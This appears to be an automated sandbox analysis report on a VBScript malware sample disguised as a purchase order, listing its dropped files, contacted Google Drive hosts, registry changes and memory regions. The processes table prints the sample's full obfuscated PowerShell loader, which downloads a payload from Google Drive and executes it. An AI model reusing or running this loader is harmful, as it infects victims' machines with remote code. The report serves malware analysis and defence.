Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
BOLUDA CORPORACI#U00d3N MAR#U00cdTIMA, S.L. PEDIDO 268e44.vbs
|
ASCII text, with CRLF line terminators
|
initial sample
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ik42faz4.rce.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ov434nxa.hxo.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Benzinforhandlers.xan
|
HTML document, ASCII text, with very long lines (1692), with no line terminators
|
dropped
|
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\BOLUDA CORPORACI#U00d3N MAR#U00cdTIMA, S.L. PEDIDO 268e44.vbs"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Licence Skafotternes Brdlses Brnetestamente #>;$Cabrera='Glassenes';<#Jotting
Slubbering Overfortolkningers Farvefjernsynene #>;$Bevaringsforanstaltning=$Uudgrundelig+$host.UI; function Osmate11($Samlets80){If
($Bevaringsforanstaltning) {$Unsavoredness++;}$Forblst=$Baktericide+$Samlets80.'Length'-$Unsavoredness; for( $Udstykningsomraadets=5;$Udstykningsomraadets
-lt $Forblst;$Udstykningsomraadets+=6){$Skomagerdrengenes=$Udstykningsomraadets;$Daschagga+=$Samlets80[$Udstykningsomraadets];$Maurers='Dictyoceratine';}$Daschagga;}function
Semicalcareous($Passionlessness){ . ($Duplicidentata) ($Passionlessness);}$fremstillingsevnen=Osmate11 'HakkeMUdsproStortz
GalliUnclel Un elBenenaVrigh/Vasom ';$fremstillingsevnen+=Osmate11 'Rhi o5Anlgs. Habi0Sblad Lyrik( eetW,ndesiF ldlnNoterdOpsejoJehovwm,ness
d bg CyrtoN ProvTUnwra T oto1sphen0Exter.Lymph0Hvine; Unaf AandeWBor.eiFor un edbu6Fllet4 esul;Nonsy Adipox Viln6F rma4Freja;Relie
InterA trivIkld.: Ribe1Bffel3T.ran1Kobra.L.mai0 Mar )Ulvef Di opG.ncaneHoeincUnderkS,idso step/Bjerg2Huma 0 ilox1Forsi0Anhng0Un,am1
Gab.0Afdel1Fikt AnticFS.aabimadolrSysteeTaihofAmb yoTrestx unap/Nomar1T ppe3Minis1Kamos.me,er0Rean ';$Lingvisternes=Osmate11
'DukseU .oncSa.oeteUdlevrForli-Go daA linjGPr vlESepa.NMotorTTegng ';$Fordrvende=Osmate11 'Vask hCi.dat ventDiblap vandsDepla:
Pres/ hets/foreodSaprorMa itiNo mavByggeem ste.SlatigHusgeoSibneo Reklg SatslNonfue strm.C.fffcbrouioCh,vamErsta/Pe.iouHidroc
uffi?Faulte paraxAxonopGerero A.rarF rsktAnnas=Reg edSeedioViolawProgrn,turklsti lo BulmatilkbdLacor&Vap.riAnoind Gash=Tymba1GanglTDeleseKnudrJOldfrPLovtel
ResntPantiNJongltepaulbOpal J sh,eE,fterIcompouMasseRErhveN VersZPo.no9GeratmBrnde2AfbetaAnnebUForl p BorgCThuriSNazir0 Te.elBlemoWindtjzFootbqSwimm0C
ronD MystyEnter ';$sortsmusket=Osmate11 ',carp>Ligki ';$Duplicidentata=Osmate11 ' LeveiFattieVa thXKabin ';$Nasalises='Filamenterne';$Friktionskoefficienterne='\Benzinforhandlers.xan';Semicalcareous
(Osmate11 ' T.pe$SlutngTrkulLBest,O GradbKra fAUnheaLcentr:Dis,uf UnhorBelfasoutnut Une.EGla ih ivena Re tainhibNHoarsdDiskesJ
urnvSangeI,ysseDrhamnEAfskrnEffem9Orium3Circu=A.sac$FdseleOutwoN ebrV eten:C.ffea ubtrpRadioPBredbd Glyca IsocT ,lodaAng.e+
S,bs$PatenfchemorMiscoiJeeptKArbejtDis,riNonseoSynkrnOvermsSgnomKTrmanO SubvE,ibroFVedhnFReco ILinkbCbran.iIndehESuspeNTadestDomm,E
kor rklammNData eHofna ');Semicalcareous (Osmate11 'gudma$ MulkGekstrLTrigooDuernbRasteAPseudLBetnk:ApostfBalstLBlandyTroj
vMejeseD ivarL njeSTimonJSteenUDevi sErosisDiscuePeakbrDesp =Lib l$SammefEksamo .ennRHorrodFor erCyclovRadi,eFodbanA scidPredeEUlnne.SjklhSKallipHo
lelBygrnI Ealdt kara(Nonab$ UnresU derOSpul,r TyvstTi,deSLaureM,onvouGemy.sHulebkMinveeT adit Mere)Alleg ');Semicalcareous
(Osmate11 'Pleu,[Jor,fNTipssE Sk ltBrutt.CoiffS CancE E ecRHalvpVBidariF lmacbrutie uercpOvertOStinki nedln F rlTMegacMNe
bjAS cioNKartoAFortrGVaagneDekstrOsteo] Sulf:Pound:Psychs GangE FaseCKulleuGruo.rdesmoiNrlsttaand,YF.reaP Suger UnenOUdkldTRu
udoKompoc.rigsOgaruaLPleon s.mal=Chas Syste[Ful sNAf evEOvereTSubv..ShellSByrneeFiniccS,aftuTviv R tehuI HalvtIncavYK rosPMumblrGlot
oDom,stf agmo,lloicBesvao Cry lSkdp,t eoxyUnmotpCleanEBambu]bus.e: Cong:Race,TOutflL S.atSSimpl1Eksot2Slvsn ');$Fordrvende=$Flyversjusser[0];$Filmatiserer=(Osmate11
'Raddl$QuillgOutsklPartioBolivbTenniaD vell konv:SubcrBForb oTaxeoN .lamA Tian=,tilnNTacitEPolarW ermi-KimmsONoe ebDodekjStatuERegarCpussytAdolp
sko S ,manY TeatS bravT gramEOr.homEncep.RasteNKundeETeodot Bron. ipstWFhaarEOversbLetvgcMuldvlOvervI.rrinE coitN WivaTUdenl
');Semicalcareous ($Filmatiserer);Semicalcareous (Osmate11 ',loac$ Un oB uieto ercynenep aFeder. OocyHP.angeFralgaTak ld TaxieFoxharKildesNonre[
Retr$Po itLRackeiMtaalncoaptgCoenuv kateivokatsbaggrtPhooleUng irBolignPaatveDuplisSpgel]Syste=Knig.$ ProdfVallirSoutteUltramWhe
ss SvejtBascui palel unpllComedi Forsn OvergBums sWindoeIsdanvAbbaynNaadle implnMosef ');$Flugtbilister=Osmate11 'sk le$ForurBDow
sobra anevapoa Groe..nsinD.plysoDy,grwDe.obnBringl Hippo UphoaP oardsvanhF MonoiProctlbubalePa,dr(Ko if$Djve FChondoBillarForlgd
Sty rknevlvRalleeUnhu nCoagudChriseHom.g, Khev$PreprC jorinon tsFemineDobbelLbeseuReengr Disse osmo1Mourn4Taels4Metat) Ef.e
';$Ciselure144=$Frstehaandsviden93;Semicalcareous (Osmate11 'Parfe$BilleGAkadeLUg deoNowhibSkod,AXmasbLAlkin:NonosFFe lbjple
roBeedggEring3 Li h3Ruptu=Spand(QuadrTB.kegESfaersUnv ntFljls-mogssp HanhAPh.siTMarkeh bund Vask$ UdtrCMagtbiMonkfS nsaleSupe,lBac.sudo.jeROxyheeStudi1Gt
el4 salg4Frok )Unpli ');while (!$Fjog33) {Semicalcareous (Osmate11 'Ndtvu$Dear.gOverelAcridocoo.obSmalfa A,myl Diss:Pu hfFFremmoRigorrRum,aeOm
laiMatchgPneumn T tae PrverBillesSammehSyntaiP zazpAnl,s= skyg$ Clovt UdverCh rauSootpeDigox ') ;Semicalcareous $Flugtbilister;Semicalcareous
(Osmate11 'BushgS StorTBijekaKoru,rUdsmutUnret- TrykSVarefLSumloE inteESnipePBrnds Celie4Faldg ');Semicalcareous (Osmate11
'Indga$QuadrgDampsLAdelaOJu.ulb Divea S,iblUnfl,:UlvanfCosigjC reboKapelgS,lgs3Conge3Indva=Aphid(S oppTDaaseECal.mSMethotGenne-
Forcp FiscaMarmeTConfuH Betr U gra$Flo lcBloksiU,perS Ar eePladdLArecaUuk.lirS ottE F st1Mabes4Perg.4Stenv)M.ane ') ;Semicalcareous
(Osmate11 ' Spek$ verrGBoderLCupstoSkjo,BSam ea lorcL Disk:AfsniNFlde ARegi,TU enli ColoOpun.tNMe acaEven LBjlkeSUnp aO.ngakC
,okliDobbeaWhin LSk alISubjeS Banit UnabE QuerRhustrnUt ttereaffSDoc e1Boiss8Intim5Diaph=Bravu$FigurG KremLBagueOFiremBcalmaADeposL
H pn:SejrraOve,dnHugenNa herU MotoLGa,pllPodicAhypertIconveCharm+Ba,df+ Atte%Boe t$La abfUnwe.lCar.oy BigavUmbereBiblir KvarsInterj
MhorUXylots rakSFootge,ahinRSnirk.noedvcPenlooGeninuCapriN obbotF dig ') ;$Fordrvende=$Flyversjusser[$Nationalsocialisternes185];}$Cruellest=298454;$Gerri=31481;Semicalcareous
(Osmate11 'Gagen$HyrekgAngi LT lefOunnotbFr dsAunpasLDiano:Dity P Vaera onogRVoldtAsipidLE.okiLTeleoEE srelBarraiB,jdsz FlydI
Usvkntrig,gOverl P osp=Ins i atchg PipieSpo.vTOveri-LigniCW hluoKnotlNUnc utFadebELigulN UndiTTekni Jarvy$slapdCUnoveiEnligsKanoneFingelEvangUMonopRArc,eEKola
1T avs4pro.r4kefti ');Semicalcareous (Osmate11 'Haren$ResidgStaggl ,humoRedifb StitaStbollSporo:Uld,aM rredeEmetosFla,so Ub,sc
ForfeSysilpDistihLeukoaSp inlNem.ri .ewrsKla smForla Highb=Uny,l Nonpe[AnkomSLiq eyRegios EstetForaneAquatmmikro.stukkCun,nvo
metrnOptllvCubaseMa,kerFortit Pala] orta:S egr:BatfiFV ljerBedstoSkorzmstyr.B KuanaVe kos U iveenean6Hulki4UrimeSPagintcinchrIndhoiAg
flnSesamgPty l(E top$ Abo.PAlebeaSnebrrIsoniaAmbullNar olEn eleInradlGaaseiByronzUnvoli LibonNew pgOutri) ksp ');Semicalcareous
(Osmate11 'Tonef$TribugFuldslG neroInterB RavnAParliLRette:El ctsLovbrk LukkaIndusAUnpron Eft SNusseeSkoleLIns.rs optrLTurb,S
palaePsiloRinforeSeaf Allo =Nonc, Numme[BespasOutthyChippsGearvtTi sye Sta mAntip.Eddist BetjEAfstixTintotSharr. Outne bolinHilahcD,magO
ealiDHurinIMarg.NSparkgBndel]mercu: Ch o:SayabAJuvenSRumfrcTysklIG ltyITendi.FairegFusleESamdrtS nkrsRygeatUlykkrFlyveI Anc
N AlthGSwing(Sel.r$ha inMBethleOvermS O phoMikroc PassE VernPRecocH SeraaInnatl Ter,IPlatySultr mSting) Bl,t ');Semicalcareous
(Osmate11 'Adeno$VandbgEhre LAffotoGidsebLykkeaP esslBagag:NulleaR.empn BaneTfogedESuperGCelluN pponi Dri NAchaeg.iploe LyncR.erraNPresteUnpo
=Purdu$ rawls C leK rammADissea.evolNIndhySDetacEO.istlRekruSSnoreLloddesSempleHandsRS,jdmE Eyne.CanthsVvni u Famib I prsDagblTFolioR
yllaISttedn Fol G rgot(stu i$ExtraCCheerRP omiU Li aeU,memLU.vejl OrthE TimeS ensiTTeg,e, Yuck$ForkoG eserESkattrGa.anR NundIMoe,t)Butto
');Semicalcareous $Antegningerne;"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
https://go.micro
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
||
https://www.google.com
|
unknown
|
||
http://nuget.org/NuGet.exe
|
unknown
|
||
http://drive.usercontent.google.com
|
unknown
|
||
https://drive.googPzm
|
unknown
|
||
https://drive.usercontent.googhko
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://drive.usercontent.google.comD=620
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
https://drive.google.com
|
unknown
|
||
https://drive.usercontent.google.com
|
unknown
|
||
https://drive.googPb
|
unknown
|
||
http://drive.google.com
|
unknown
|
||
https://aka.ms/pscore68
|
unknown
|
||
https://apis.google.com
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
There are 11 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
drive.google.com
|
142.250.185.206
|
||
drive.usercontent.google.com
|
142.250.185.65
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
142.250.185.206
|
drive.google.com
|
United States
|
||
142.250.185.65
|
drive.usercontent.google.com
|
United States
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
1400DC05000
|
heap
|
page read and write
|
||
1400DC0E000
|
heap
|
page read and write
|
||
1400BC85000
|
heap
|
page read and write
|
||
1400BC4D000
|
heap
|
page read and write
|
||
1400E241000
|
heap
|
page read and write
|
||
200F5FE000
|
stack
|
page read and write
|
||
7FFB4AC70000
|
trusted library allocation
|
page read and write
|
||
1E9B2206000
|
heap
|
page read and write
|
||
1E9B24AF000
|
heap
|
page read and write
|
||
1E998310000
|
heap
|
page read and write
|
||
1400BCB3000
|
heap
|
page read and write
|
||
1400BBEB000
|
heap
|
page read and write
|
||
1400BCD0000
|
heap
|
page read and write
|
||
1400E240000
|
heap
|
page read and write
|
||
1400BC6A000
|
heap
|
page read and write
|
||
1E99BBD6000
|
trusted library allocation
|
page read and write
|
||
1400DC0D000
|
heap
|
page read and write
|
||
1E998314000
|
heap
|
page read and write
|
||
1E99BAAA000
|
trusted library allocation
|
page read and write
|
||
1400BC48000
|
heap
|
page read and write
|
||
7FFB4ACA0000
|
trusted library allocation
|
page read and write
|
||
1400DC03000
|
heap
|
page read and write
|
||
1E9982AA000
|
heap
|
page read and write
|
||
1E99A1DD000
|
trusted library allocation
|
page read and write
|
||
1E99A1C8000
|
trusted library allocation
|
page read and write
|
||
7FFB4AA80000
|
trusted library allocation
|
page read and write
|
||
1400DC07000
|
heap
|
page read and write
|
||
1E9B2498000
|
heap
|
page read and write
|
||
1E998397000
|
heap
|
page read and write
|
||
1E999F57000
|
trusted library allocation
|
page read and write
|
||
7FFB4AB56000
|
trusted library allocation
|
page execute and read and write
|
||
1400DC83000
|
heap
|
page read and write
|
||
1E998290000
|
trusted library allocation
|
page read and write
|
||
1400BC45000
|
heap
|
page read and write
|
||
1400DC00000
|
heap
|
page read and write
|
||
7FFB4ACD0000
|
trusted library allocation
|
page read and write
|
||
1E999DB1000
|
trusted library allocation
|
page read and write
|
||
1400DD0B000
|
heap
|
page read and write
|
||
1400DC0D000
|
heap
|
page read and write
|
||
4C5CE7E000
|
stack
|
page read and write
|
||
1400BDD0000
|
heap
|
page read and write
|
||
1400BC2E000
|
heap
|
page read and write
|
||
7FFB4AC40000
|
trusted library allocation
|
page execute and read and write
|
||
1E9B2376000
|
heap
|
page execute and read and write
|
||
4C5CD78000
|
stack
|
page read and write
|
||
1400BC85000
|
heap
|
page read and write
|
||
4C5CA7E000
|
stack
|
page read and write
|
||
1400BC67000
|
heap
|
page read and write
|
||
1E9B222B000
|
heap
|
page read and write
|
||
1E9982C0000
|
heap
|
page read and write
|
||
1400DC83000
|
heap
|
page read and write
|
||
1E9B2280000
|
heap
|
page execute and read and write
|
||
1400DC4C000
|
heap
|
page read and write
|
||
7FFB4AA7D000
|
trusted library allocation
|
page execute and read and write
|
||
4C5CC77000
|
stack
|
page read and write
|
||
1E99B378000
|
trusted library allocation
|
page read and write
|
||
1400DC32000
|
heap
|
page read and write
|
||
1400DC02000
|
heap
|
page read and write
|
||
4C5CB7E000
|
stack
|
page read and write
|
||
200FCFB000
|
stack
|
page read and write
|
||
1400BC44000
|
heap
|
page read and write
|
||
1400DC02000
|
heap
|
page read and write
|
||
1400BC66000
|
heap
|
page read and write
|
||
4C5CDFE000
|
stack
|
page read and write
|
||
7FFB4ADD0000
|
trusted library allocation
|
page read and write
|
||
7FFB4AD00000
|
trusted library allocation
|
page read and write
|
||
1E9983A1000
|
heap
|
page read and write
|
||
1400DE11000
|
heap
|
page read and write
|
||
7FFB4AC60000
|
trusted library allocation
|
page execute and read and write
|
||
1400DC83000
|
heap
|
page read and write
|
||
7FFB4ACE0000
|
trusted library allocation
|
page read and write
|
||
7FFB4ADA0000
|
trusted library allocation
|
page read and write
|
||
7FFB4AC52000
|
trusted library allocation
|
page read and write
|
||
1400DC83000
|
heap
|
page read and write
|
||
1400DC01000
|
heap
|
page read and write
|
||
1400BC7F000
|
heap
|
page read and write
|
||
200F8FE000
|
stack
|
page read and write
|
||
7FFB4ADC0000
|
trusted library allocation
|
page read and write
|
||
7FFB4AB26000
|
trusted library allocation
|
page read and write
|
||
1E998308000
|
heap
|
page read and write
|
||
1E998393000
|
heap
|
page read and write
|
||
4C5CCF9000
|
stack
|
page read and write
|
||
4C5DACD000
|
stack
|
page read and write
|
||
1400BC16000
|
heap
|
page read and write
|
||
1E99BAAF000
|
trusted library allocation
|
page read and write
|
||
1400BE50000
|
heap
|
page read and write
|
||
1E9982B0000
|
heap
|
page read and write
|
||
7FFB4AB20000
|
trusted library allocation
|
page read and write
|
||
1400DC1C000
|
heap
|
page read and write
|
||
1E9B220E000
|
heap
|
page read and write
|
||
1400DC09000
|
heap
|
page read and write
|
||
1400BC34000
|
heap
|
page read and write
|
||
1E99A35A000
|
trusted library allocation
|
page read and write
|
||
1400BBEA000
|
heap
|
page read and write
|
||
1E998230000
|
heap
|
page read and write
|
||
1400DC17000
|
heap
|
page read and write
|
||
7FFB4AB2C000
|
trusted library allocation
|
page execute and read and write
|
||
1400DC0D000
|
heap
|
page read and write
|
||
7FFB4AC80000
|
trusted library allocation
|
page read and write
|
||
7FFB4AA73000
|
trusted library allocation
|
page execute and read and write
|
||
1400DC2A000
|
heap
|
page read and write
|
||
1E9AA027000
|
trusted library allocation
|
page read and write
|
||
1400BC25000
|
heap
|
page read and write
|
||
1E9B2511000
|
heap
|
page read and write
|
||
7FFB4AC90000
|
trusted library allocation
|
page read and write
|
||
1E9B24E1000
|
heap
|
page read and write
|
||
7FFB4AD80000
|
trusted library allocation
|
page read and write
|
||
7FFB4AD90000
|
trusted library allocation
|
page read and write
|
||
1400DC83000
|
heap
|
page read and write
|
||
1E99A29B000
|
trusted library allocation
|
page read and write
|
||
1400DC83000
|
heap
|
page read and write
|
||
7FFB4AC10000
|
trusted library allocation
|
page read and write
|
||
1400BC31000
|
heap
|
page read and write
|
||
1400BF60000
|
heap
|
page read and write
|
||
1E998270000
|
trusted library allocation
|
page read and write
|
||
1E99A2D8000
|
trusted library allocation
|
page read and write
|
||
1400DC83000
|
heap
|
page read and write
|
||
7DF3FF140000
|
trusted library allocation
|
page execute and read and write
|
||
1E998399000
|
heap
|
page read and write
|
||
1400DC04000
|
heap
|
page read and write
|
||
4C5DA4C000
|
stack
|
page read and write
|
||
1E99BEDA000
|
trusted library allocation
|
page read and write
|
||
1E99BF44000
|
trusted library allocation
|
page read and write
|
||
4C5CAFE000
|
stack
|
page read and write
|
||
1400DC83000
|
heap
|
page read and write
|
||
1E9B2198000
|
heap
|
page read and write
|
||
1E9B2370000
|
heap
|
page execute and read and write
|
||
1400DC83000
|
heap
|
page read and write
|
||
1400BC59000
|
heap
|
page read and write
|
||
1400BC27000
|
heap
|
page read and write
|
||
7FFB4AD50000
|
trusted library allocation
|
page read and write
|
||
4C5C533000
|
stack
|
page read and write
|
||
1400BC6A000
|
heap
|
page read and write
|
||
1400BC29000
|
heap
|
page read and write
|
||
1400BBC0000
|
heap
|
page read and write
|
||
1400BC34000
|
heap
|
page read and write
|
||
7FFB4ACB0000
|
trusted library allocation
|
page read and write
|
||
7FFB4AB90000
|
trusted library allocation
|
page execute and read and write
|
||
1400DC83000
|
heap
|
page read and write
|
||
1E9B218C000
|
heap
|
page read and write
|
||
1E998550000
|
heap
|
page readonly
|
||
1E9B2480000
|
heap
|
page read and write
|
||
7FFB4AD60000
|
trusted library allocation
|
page read and write
|
||
1400DC84000
|
heap
|
page read and write
|
||
1E998305000
|
heap
|
page read and write
|
||
1400DC41000
|
heap
|
page read and write
|
||
7FFB4AC21000
|
trusted library allocation
|
page read and write
|
||
1E99BAC4000
|
trusted library allocation
|
page read and write
|
||
1400DC83000
|
heap
|
page read and write
|
||
1400BC62000
|
heap
|
page read and write
|
||
1400BC25000
|
heap
|
page read and write
|
||
4C5CF7E000
|
stack
|
page read and write
|
||
7FFB4AD40000
|
trusted library allocation
|
page read and write
|
||
200F3FE000
|
stack
|
page read and write
|
||
1400BC85000
|
heap
|
page read and write
|
||
1400DC07000
|
heap
|
page read and write
|
||
200F2FE000
|
stack
|
page read and write
|
||
200F9FE000
|
stack
|
page read and write
|
||
1E999D31000
|
trusted library allocation
|
page read and write
|
||
4C5D9CE000
|
stack
|
page read and write
|
||
4C5CBF7000
|
stack
|
page read and write
|
||
1400BC85000
|
heap
|
page read and write
|
||
7FFB4AD30000
|
trusted library allocation
|
page read and write
|
||
1E99A1C4000
|
trusted library allocation
|
page read and write
|
||
1E998560000
|
trusted library allocation
|
page read and write
|
||
1E99BAE8000
|
trusted library allocation
|
page read and write
|
||
1400DC3E000
|
heap
|
page read and write
|
||
1E99A65F000
|
trusted library allocation
|
page read and write
|
||
7FFB4AA90000
|
trusted library allocation
|
page read and write
|
||
1E99BAD0000
|
trusted library allocation
|
page read and write
|
||
1E9B2330000
|
heap
|
page read and write
|
||
1400BC2A000
|
heap
|
page read and write
|
||
1E99834E000
|
heap
|
page read and write
|
||
1400BC8F000
|
heap
|
page read and write
|
||
1400BC40000
|
heap
|
page read and write
|
||
1E9B24B3000
|
heap
|
page read and write
|
||
1400DC0D000
|
heap
|
page read and write
|
||
1E99A2DC000
|
trusted library allocation
|
page read and write
|
||
1400DC0A000
|
heap
|
page read and write
|
||
7FFB4ADB0000
|
trusted library allocation
|
page read and write
|
||
1400BC16000
|
heap
|
page read and write
|
||
1400DFCA000
|
heap
|
page read and write
|
||
4C5C87E000
|
stack
|
page read and write
|
||
1E9B2380000
|
heap
|
page read and write
|
||
1E99B05F000
|
trusted library allocation
|
page read and write
|
||
1400DC22000
|
heap
|
page read and write
|
||
1400BDB0000
|
heap
|
page read and write
|
||
7FFB4ACF0000
|
trusted library allocation
|
page read and write
|
||
1E9B253B000
|
heap
|
page read and write
|
||
7FFB4AA74000
|
trusted library allocation
|
page read and write
|
||
1400BC2E000
|
heap
|
page read and write
|
||
1400BC8C000
|
heap
|
page read and write
|
||
1E99A5F6000
|
trusted library allocation
|
page read and write
|
||
4C5CEFE000
|
stack
|
page read and write
|
||
1400DC83000
|
heap
|
page read and write
|
||
200EF8A000
|
stack
|
page read and write
|
||
1E99BACC000
|
trusted library allocation
|
page read and write
|
||
1400DC25000
|
heap
|
page read and write
|
||
1400DAF2000
|
heap
|
page read and write
|
||
1E9B1D34000
|
heap
|
page read and write
|
||
1E9980F0000
|
heap
|
page read and write
|
||
1400BBF0000
|
heap
|
page read and write
|
||
1E9A9D9E000
|
trusted library allocation
|
page read and write
|
||
1E9981D0000
|
heap
|
page read and write
|
||
1E9982CE000
|
heap
|
page read and write
|
||
1E999BC0000
|
trusted library allocation
|
page read and write
|
||
7FFB4AD70000
|
trusted library allocation
|
page read and write
|
||
7FFB4AA8B000
|
trusted library allocation
|
page read and write
|
||
1E99A1CC000
|
trusted library allocation
|
page read and write
|
||
1E99BF1C000
|
trusted library allocation
|
page read and write
|
||
7FFB4AC30000
|
trusted library allocation
|
page execute and read and write
|
||
1E99BAC1000
|
trusted library allocation
|
page read and write
|
||
1400DC83000
|
heap
|
page read and write
|
||
1400BC7F000
|
heap
|
page read and write
|
||
1400DC35000
|
heap
|
page read and write
|
||
1400BBF0000
|
heap
|
page read and write
|
||
7FFB4ADF0000
|
trusted library allocation
|
page read and write
|
||
1400BC5B000
|
heap
|
page read and write
|
||
200F7FE000
|
stack
|
page read and write
|
||
7FFB4AD10000
|
trusted library allocation
|
page read and write
|
||
1E998326000
|
heap
|
page read and write
|
||
1E9981F0000
|
heap
|
page read and write
|
||
1E99A1B9000
|
trusted library allocation
|
page read and write
|
||
4C5CFFB000
|
stack
|
page read and write
|
||
1400BC7F000
|
heap
|
page read and write
|
||
1E99B9FD000
|
trusted library allocation
|
page read and write
|
||
4C5C5FE000
|
stack
|
page read and write
|
||
1E9A9EE1000
|
trusted library allocation
|
page read and write
|
||
4C5C8FE000
|
stack
|
page read and write
|
||
1E99BF17000
|
trusted library allocation
|
page read and write
|
||
1400DC83000
|
heap
|
page read and write
|
||
1400BC48000
|
heap
|
page read and write
|
||
1400BC5B000
|
heap
|
page read and write
|
||
1400DC12000
|
heap
|
page read and write
|
||
7FFB4ACC0000
|
trusted library allocation
|
page read and write
|
||
1400DC46000
|
heap
|
page read and write
|
||
4C5C97E000
|
stack
|
page read and write
|
||
1E99A379000
|
trusted library allocation
|
page read and write
|
||
1E9B23A3000
|
heap
|
page read and write
|
||
1400DC83000
|
heap
|
page read and write
|
||
1E9985A0000
|
heap
|
page read and write
|
||
1400DC35000
|
heap
|
page read and write
|
||
1400BC34000
|
heap
|
page read and write
|
||
1400BBE9000
|
heap
|
page read and write
|
||
1400BC4A000
|
heap
|
page read and write
|
||
1400BBC9000
|
heap
|
page read and write
|
||
1E999D20000
|
heap
|
page execute and read and write
|
||
1400DC2E000
|
heap
|
page read and write
|
||
1400BC2E000
|
heap
|
page read and write
|
||
1400BC7F000
|
heap
|
page read and write
|
||
7FFB4ADE0000
|
trusted library allocation
|
page read and write
|
||
1400DC83000
|
heap
|
page read and write
|
||
1400DD07000
|
heap
|
page read and write
|
||
1E9B21D8000
|
heap
|
page read and write
|
||
7FFB4AC2A000
|
trusted library allocation
|
page read and write
|
||
1400DE25000
|
heap
|
page read and write
|
||
1400DC06000
|
heap
|
page read and write
|
||
7FFB4AACC000
|
trusted library allocation
|
page execute and read and write
|
||
7FFB4AA72000
|
trusted library allocation
|
page read and write
|
||
1400BC5C000
|
heap
|
page read and write
|
||
1E9A9D31000
|
trusted library allocation
|
page read and write
|
||
1E9B2180000
|
heap
|
page read and write
|
||
1400BBEC000
|
heap
|
page read and write
|
||
7FFB4AD20000
|
trusted library allocation
|
page read and write
|
||
1E99A1AF000
|
trusted library allocation
|
page read and write
|
||
1400BC85000
|
heap
|
page read and write
|
||
1400DC83000
|
heap
|
page read and write
|
||
1400BC6A000
|
heap
|
page read and write
|
||
1E9AA019000
|
trusted library allocation
|
page read and write
|
||
1E9982B5000
|
heap
|
page read and write
|
||
1400BC62000
|
heap
|
page read and write
|
||
4C5C9FC000
|
stack
|
page read and write
|
||
1400DC3A000
|
heap
|
page read and write
|
||
1400BCA9000
|
heap
|
page read and write
|
||
1E9982A0000
|
heap
|
page read and write
|
||
7FFB4AA70000
|
trusted library allocation
|
page read and write
|
||
200F6FE000
|
stack
|
page read and write
|
||
1E9985A5000
|
heap
|
page read and write
|
||
1E9B24B7000
|
heap
|
page read and write
|
||
200FBFE000
|
stack
|
page read and write
|
||
1E99BAD4000
|
trusted library allocation
|
page read and write
|
||
1E9B24BF000
|
heap
|
page read and write
|
||
1400BC7F000
|
heap
|
page read and write
|
||
1400BC50000
|
heap
|
page read and write
|
||
1E999BF0000
|
trusted library allocation
|
page read and write
|
||
1400DC0F000
|
heap
|
page read and write
|
||
1E9B21D6000
|
heap
|
page read and write
|
||
1E9A9D41000
|
trusted library allocation
|
page read and write
|
||
4C5C5BE000
|
stack
|
page read and write
|
||
1400BF65000
|
heap
|
page read and write
|
||
1E9B2830000
|
heap
|
page read and write
|
||
1400DC1D000
|
heap
|
page read and write
|
||
1400BC2C000
|
heap
|
page read and write
|
||
1E9B23A6000
|
heap
|
page read and write
|
